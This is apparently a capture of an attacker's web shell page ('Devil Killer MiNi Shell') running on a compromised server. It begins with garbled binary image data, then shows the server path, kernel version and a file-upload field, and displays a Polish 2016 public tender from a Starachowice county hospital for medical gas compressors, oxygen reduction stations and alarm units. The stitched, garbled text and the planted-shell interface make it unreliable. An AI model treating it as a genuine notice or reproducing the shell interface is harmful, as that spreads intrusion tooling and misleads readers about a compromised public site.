JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161104/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161104/336252-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://zoz.starachowice.sisco.info/' target='_blank'>http://zoz.starachowice.sisco.info/</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 336252 - 2016
              z dnia 2016-11-04 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Starachowice: Dostawa i montaż urządzeń stacji sprężarek powietrza, rezerwowej stacji redukcji tlenu, stacji redukcji podtlenku azotu, strefowych zespołów kontrolno-alarmowych i sygnalizatorów stanu gazów medycznych dla Powiatowego Zakładu Opieki  Zdrowotnej z siedzibą w Starachowicach<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Powiatowy Zakład Opieki Zdrowotnej, krajowy numer identyfikacyjny
              29114175200000, ul.
              ul. Radomska 
              70,
              27200  
              Starachowice, woj.
              świętokrzyskie, państwo
              Polska, tel.
              041 2745202 w. 182, e-mail
              , faks
              412 746 158.
              <br />
              Adres strony internetowej (URL): http://zoz.starachowice.sisco.info/<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Samodzieny Publiczny Zakład Opieki Zdrowotnej</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br />http://zoz.starachowice.sisco.info/</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br />http://zoz.starachowice.sisco.info/</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />Powiatowy Zakład Opieki Zdrowotnej, ul. Radomska 70, 27-200 Starachowice</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa i montaż urządzeń stacji sprężarek powietrza, rezerwowej stacji redukcji tlenu, stacji redukcji podtlenku azotu, strefowych zespołów kontrolno-alarmowych i sygnalizatorów stanu gazów medycznych dla Powiatowego Zakładu Opieki  Zdrowotnej z siedzibą w Starachowicach<br /><b>Numer referencyjny: </b>P/46/10/2016/GAZ<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />3<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Zadanie nr 1
Modernizacja stacji sprężonego powietrza do celów medycznych.
Układ połączeń w stacji sprężarek oraz zastosowane urządzenia powinny być zgodne 
z wymaganiami PN-EN ISO 7396-1. W zakresie przedmiotu zamówienia znajdują się dostawa, montaż i uruchomienie następujących urządzeń: 
	2 x sprężarka śrubowa smarowana olejem o wydajności min. 100 m3/h, ciśnienie tłoczenia 11 bar(g),
	podwójna jednostka oczyszczająca, wytwarzająca sprężone powietrze w klasie 1,1,1 wg. ISO 8573-1.

Zadanie nr 2
Modernizacja rampy tlenu i podtlenku azotu.
Rezerwowa stacja redukcji tlenu wraz z węzłem redukcyjnym ze stacji zgazowania tlenu.
         Układ połączeń w rezerwowej stacji redukcji tlenu oraz zastosowane urządzenia powinny być zgodne z wymaganiami PN-EN ISO 7396-1. W zakresie przedmiotu zamówienia znajdują się dostawa, montaż i uruchomienie następujących urządzeń: 
	dwustopniowa automatyczna tablica redukcyjna tlenu zasilana dwustronnie, wyposażona 
w przełącznik automatyczny, cyfrowy panel kontrolny. Wydajność przepływu min. 170 m3/h przy ciśn. 5 bar, ciśnienie wlotowe tablicy 300 bar, ciśnienie wyjściowe regulowane w zakresie 1-9 bar, zasilanie 230 VAC,
	cyfrowy panel kontrolny tablicy, który monitoruje i wyświetla parametry pracy urządzenia: bieżącą wartość ciśnienia w rampach butlowych, wartość ciśnienia wyjściowego, stan zaworów odcinających (otwarty / zamknięty),
	2 x rampa z 12 stanowiskami butlowymi każde z zaworem zwrotnym i przyłączem elastycznym butli. Każda z ramp wyposażona w zawór wydmuchowy i manometr ciśnienia, zawór odcinający rampę od tablicy z filtrem wysokociśnieniowym,
	2 x zawór z czujnikiem pozycji otwarty/zamknięty i sygnalizacją stanu w tablicy redukcyjnej,
	2 x zawór zwrotny,
	podwójny węzeł redukcyjny tlenu ze stacji zgazowania wyposażony w zawory bezpieczeństwa. Max ciśnienie wlotowe 25 bar, ciśnienie wyjściowe regulowane w zakresie 1-9 bar,
	moduł telemetryczny sygnalizacji alarmowej źródła zasilania wspólny ze st. redukcji N2O. Modernizacja rampy tlenu i podtlenku azotu.
Rezerwowa stacja redukcji tlenu wraz z węzłem redukcyjnym ze stacji zgazowania tlenu.
         Układ połączeń w rezerwowej stacji redukcji tlenu oraz zastosowane urządzenia powinny być zgodne z wymaganiami PN-EN ISO 7396-1. W zakresie przedmiotu zamówienia znajdują się dostawa, montaż i uruchomienie następujących urządzeń: 
	dwustopniowa automatyczna tablica redukcyjna tlenu zasilana dwustronnie, wyposażona 
w przełącznik automatyczny, cyfrowy panel kontrolny. Wydajność przepływu min. 170 m3/h przy ciśn. 5 bar, ciśnienie wlotowe tablicy 300 bar, ciśnienie wyjściowe regulowane w zakresie 1-9 bar, zasilanie 230 VAC,
	cyfrowy panel kontrolny tablicy, który monitoruje i wyświetla parametry pracy urządzenia: bieżącą wartość ciśnienia w rampach butlowych, wartość ciśnienia wyjściowego, stan zaworów odcinających (otwarty / zamknięty),
	2 x rampa z 12 stanowiskami butlowymi każde z zaworem zwrotnym i przyłączem elastycznym butli. Każda z ramp wyposażona w zawór wydmuchowy i manometr ciśnienia, zawór odcinający rampę od tablicy z filtrem wysokociśnieniowym,
	2 x zawór z czujnikiem pozycji otwarty/zamknięty i sygnalizacją stanu w tablicy redukcyjnej,
	2 x zawór zwrotny,
	podwójny węzeł redukcyjny tlenu ze stacji zgazowania wyposażony w zawory bezpieczeństwa. Max ciśnienie wlotowe 25 bar, ciśnienie wyjściowe regulowane w zakresie 1-9 bar,
	moduł telemetryczny sygnalizacji alarmowej źródła zasilania wspólny ze st. redukcji N2O. 

Zadanie nr 3
Wymiana strefowych zespołów kontrolno-alarmowych i sygnalizatorów stanu gazów medycznych na Bloku Operacyjnym i Oddziale Anestezjologii i Intensywnej Terapii.
W ramach przedmiotowego zadania, Zamawiający wymaga montażu strefowych zespołów kontrolno-alarmowych (10 szt.) i współpracujących z nimi sygnalizatorów stanu gazów medycznych (16 szt.).   
Zespół kontrolno-alarmowy musi spełniać wymogi obowiązujących norm w tym PN-EN ISO 7396-1 oraz Dyrektywy Medycznej MDD 93/42 EEC oraz posiadać oznaczenie znakiem zgodności CE potwierdzone przez Jednostkę Notyfikowaną i muszą być zarejestrowane jako wyrób medyczny klasy IIb oraz umożliwiać:
	zamykanie i otwieranie przepływu gazów będących pod ciśnieniem,
	pomiar ze wskazaniem bieżącym ciśnienia i podciśnienia gazów z wykorzystaniem wyświetlacza LCD i panela dotykowego,
	generowanie sygnałów dla potrzeb sygnalizacji awaryjnej,
	sygnalizowanie w sposób optyczny i akustyczny stanów alarmowych (przekroczenie ciśnienia max. i min),
	uzyskanie tolerancji pomiaru ciśnienia przez czujnik, nie przekraczającej  3%,
	podłączenie zasilania awaryjnego dla obsługiwanego obszaru w przypadku awarii centralnego zasilania w gazy medyczne,
	współpracę z zewnętrznymi sygnalizatorami stanu gazów medycznych wyposażonymi 
w wyświetlacz LCD i panel dotykowy.
<br /><br /><b>II.5) Główny kod CPV: </b>42123400-1<br /><b> Dodatkowe kody CPV:</b>33157000-5<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 6<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Okres realizacji zamówienia od min. 3 do max. 6 miesięcy - kryterium oceny ofert</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                przedstawienie koncesji, zezwolenia, licencji lub dokumentu potwierdzającego, że wykonawca  jest wpisany do jednego z rejestrów zawodowych lub handlowych
<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                przedstawienie informacji banku informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                przedstawienie wykazu min. 2 dostaw lub usług wykonanych , a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane oraz załączeniem dowodów określających czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie,    odpowiadające wartością i rodzajem przedmiotowi zamówienia.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                Zamawiający wymaga przedstawienia dokumentów potwierdzających dysponowanie co najmniej 2 osobami, które posiadają ważne uprawnienia Świadectwa Kwalifikacyjne zgodnie z PN-EN ISO 13585:2012 "Lutowanie twarde - Kwalifikowanie lutowaczy i operatorów lutowania twardego" które będą uczestniczyły w realizacji zamówienia</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Oświadczenie wykonawcy składane na podstawie art. 25a ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (dalej jako: ustawa Pzp), 
DOTYCZĄCE PRZESŁANEK WYKLUCZENIA Z POSTĘPOWANIA załącznik nr 2 do SIWZ
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Oświadczenie wykonawcy składane na podstawie art. 25a ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (dalej jako: ustawa Pzp), 
DOTYCZĄCE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU - załącznik nr 3 do SIWZ
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">Aprobata CE dla wyrobu medycznego zgodnie z 93/42/EEC - dotyczy zadania nr 1, 2, 3
Rejestracja/Zgłoszenie w Urzędzie Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych w Warszawie jako wyrób medyczny klasy IIb - dotyczy zadania nr 3</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres gwarancji</td><td>20</td></tr><tr><td>Termin realizacji</td><td>15</td></tr><tr><td>Okres płatności</td><td>5</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
